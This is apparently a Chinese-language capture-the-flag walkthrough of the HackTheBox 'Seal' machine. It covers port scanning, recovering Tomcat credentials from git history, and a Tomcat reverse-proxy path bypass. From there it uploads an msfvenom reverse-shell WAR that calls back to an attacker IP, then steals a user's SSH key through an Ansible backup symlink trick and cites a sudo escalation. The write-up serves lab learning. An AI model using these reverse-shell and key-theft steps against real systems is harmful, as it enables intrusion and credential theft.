HackTheBox::Seal
0x00 信息收集
nmap -Pn -p- -T4 --min-rate=1000 10.10.10.250
nmap -Pn -p22,443,8080 -sCV 10.10.10.250
将seal.htb添加到hosts文件中。
查看443端口对应的界面,未发现可利用的点。
查看8080端口,是一个类似git仓库的登录界面。
尝试弱口令失败后,注册一个账号进行登录,注册处有一个上传图片的地方,尝试进行文件上传失败。
使用注册后的账号成功登录,通过查看仓库,发现使用了tomcat,并且根据提示内容看到使用了nginx作为负载均衡。查看仓库中的tomcat-users.xml文件,未发现账号密码信息。最终通过commit,找到了升级后的tomcat-users.xml文件,得到了tomcat的账号密码。
tomcat/42MrHBf*z8{Z%
0x01 漏洞利用
得到账号密码后,则尝试进行登录,最终在443端口的路径/manager/status出登录得到的账号密码
登录管理后台后,未发现可以上传war包的地方,继续进行尝试。
尝试访问路径,都会提示403,最后发现了tomcat的一个路径绕过漏洞。
https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
尝试绕过,看是否能进行文件上传,最终得到文件上传的路径。
生成war包进行上传
msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.14.14" LPORT=4444 -f war > shell.war
此处上传需要使用burp进行抓包改路径并进行绕过,否则会上传失败。
访问路径/shell,成功得到了shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
由于tomcat用户权限较低,因此需要先将用户的权限提升为luis
0x02 权限提升
find / -user luis 2>/dev/null | grep -vE 'proc|/\.'
在路径/opt/backups/playbook中发现一个run.yml文件。
通过相关参考发现这个yml文件是在做备份的功能,且权限为luis。
https://docs.ansible.com/ansible/2.3/synchronize_module.html
此处漏洞利用思路为,将luis的ssh_keyjinxing进行备份,通过查看备份文件得到key,最后使用ssh登录luis用户。
ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
ls -al /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
ls /opt/backups/archives
cp /opt/backups/archives/backup-2021-11-24-02:36:34.gz ./backup.tar.gz
tar -xzvf backup.tar.gz
得到ssh_key
使用ssh进行登录
使用sudo -l查看相关权限
参考https://gtfobins.github.io/gtfobins/ansible-playbook/
HackTheBox::Seal相关推荐
- seal report mysql_Seal Report开放数据库报表工具(.Net)
概述:开放数据库报表工具(.Net) 简介:Seal-Report提供了一个完整的框架,用于从任何数据库生成日常报告和仪表板.Seal-Report是Microsoft .NET Framework完 ...
- 基于SEAL库实现PSI-报错实录2
基于SEAL库实现PSI-报错实录2 illegal hardware instruction illegal hardware instruction 设置客户端和服务器端的大小时, 如果设置为cl ...
- 基于SEAL库实现PSI-报错实录1
基于SEAL库实现PSI-报错实录1 hash函数--string 转char* 基于论文"Fast Private Set Intersection from Homomorphic En ...
- Mac os安装SEAL
cmake的选项可以参考:https://github.com/microsoft/SEAL#optional-debug-and-release-modes 视频参考:https://www.you ...
- sqlmap md5怎么解密_三十九,hackthebox渗透之DirBuster扫描路径及Sqlmap
一.DirBuster扫描目录 hack the box是一个在线Web渗透实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有.因为这些靶机放在平台上供大 ...
- Hackthebox(1)系列持续更新
Hackthebox第一关 文章目录 Hackthebox第一关 一.Hackthebox配置openvpn 配置openvpn 二.第0层(简单) 终端弄好以后点击产卵机,然后会给你创建一个实例 问 ...
- HackTheBox MetaTwo 网站框架CVE获取用户shell和破解私钥提权
题目网址: https://app.hackthebox.com/machines/MetaTwo 枚举 使用nmap枚举靶机 nmap -sC -sV -p- 10.10.11.186 扫到了域名, ...
- linux安装globalsign证书,免费安装 GlobalSign 安全签章 GlobalSign Secured Seal
免费安装 GlobalSign 安全签章GlobalSign Secured Seal 凡购买 GlobalSign 数字证书客户即可免费安装 GlobalSign 安全签章 GlobalSign 安 ...
- HackTheBox 如何使用
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start ...
最新文章
- 关于数据库中NULL的描述,下列哪些说法符合《阿里巴巴Java开发手册》
- Android.mk文件编写
- html和html5学习
- 修改input的text 通过jquery的html获取值 未变化
- Mantis使用说明
- 记录 之 tensorflow中几个常用的函数:tf.unstack,tf.concat() 和 tf.stack() 等
- 机器学习基础---超参数和验证集
- 【大健康】高保真交互原型模板+大健康生态问诊app+饮食运动数据血糖血压健康数据的管理移动端+在线挂号、体检预约、远程在线视频电话图文问诊医疗服务+积分商城设备管理+健康档案
- 微博基于 Flink 的机器学习实践
- 计算机操作系统详细学习笔记(一):计算机操作系统概述
- pcl 使用gpu计算法向量_PCL点云特征描述与提取(1)
- listary文件查找工具下载及使用
- SQL语句优化常见方法
- 浏览器UserAgent的趣味史
- 除了 P 站,程序员摸鱼还喜欢上哪些网站?
- 形容人的内核是什么意思_cpu核数是什么意思
- JavaScript - 从身份证号中获取生日
- 如何用matlab中syms建立符号方程,用matlab求解符号方程及符号方程组
- autojs发微信通知
- Docker构建JDK 镜像